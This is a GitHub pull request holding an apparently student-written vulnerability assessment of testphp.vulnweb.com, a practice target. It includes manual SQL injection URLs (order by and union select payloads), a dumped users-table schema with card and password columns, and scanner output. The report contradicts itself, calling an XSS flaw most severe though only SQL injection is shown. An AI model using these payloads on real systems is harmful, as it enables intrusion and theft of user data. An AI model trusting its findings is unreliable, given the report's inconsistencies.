Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cybergooys vulneribilty assesment #21

Open
wants to merge 1 commit into
base: master
Choose a base branch
from

Conversation

SARFAS-P
Copy link

cybergooys vulnerability assessment

This vulnerability assessment report was conducted on the web application http://testphp.vulnweb.com/. The assessment was conducted using a variety of tools and techniques, including sqlmap,nikito,manually injection of SQL The assessment identified a number of vulnerabilities, SQL injection. The most severe vulnerability identified was a SQL injection vulnerability that could allow an attacker to inject sql code into the steal information and steal user details like email password phonenumber.

Introduction

The objective of this vulnerability assessment was to identify and assess the security risks associated with the web application http://testphp.vulnweb.com/. The assessment was conducted in accordance with the Open Web Application Security Project (OWASP) Testing Guide.

Methodology

The following tools and techniques were used to conduct the vulnerability assessment:

  • **sqlmap :A tool used for injecting SQL injection and getting the database by columns etc.
  • Nikto: A network security scanner that identifies and assesses vulnerabilities in web servers and other network devices.
  • **nmap:A network security scanner that identifies and assesses vulnerabilities in web servers and other network devices.

Findings

The following vulnerabilities were identified during the vulnerability assessment:

*Getting database from acart
*Adding new new images to the poster
*

Conclusion

This vulnerability assessment identified a number of security risks associated with the web application http://testphp.vulnweb.com/. The most severe vulnerability identified was a critical XSS vulnerability that could allow an attacker to inject malicious code into the web application and steal user cookies or session tokens. The web application owner should take immediate steps to remediate the identified vulnerabilities.

Appendix

mapDatabase: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| name | varchar(100) |
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

(sarfas㉿kali)-[~]
└─$ nikto -url http://testphp.vulnweb.com

  • Nikto v2.5.0

  • Multiple IPs found: 44.228.249.3, 64:ff9b::2ce4:f903
  • Target IP: 44.228.249.3
  • Target Hostname: testphp.vulnweb.com
  • Target Port: 80
  • Start Time: 2023-11-17 01:05:16 (GMT5.5)

injecting sql manually

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 15
Error: Unknown column '15' in 'order clause' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11

added a new poster to it

nmap scan

└─$ nmap -v -A 44.228.249.3~
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-17 01:46 IST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Failed to resolve "44.228.249.3~".
NSE: Script Post-scanning.
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Initiating NSE at 01:46
Completed NSE at 01:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.28 seconds

from cybergooys
@SARFAS-P
Copy link
Author

from cybergooys learning path

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant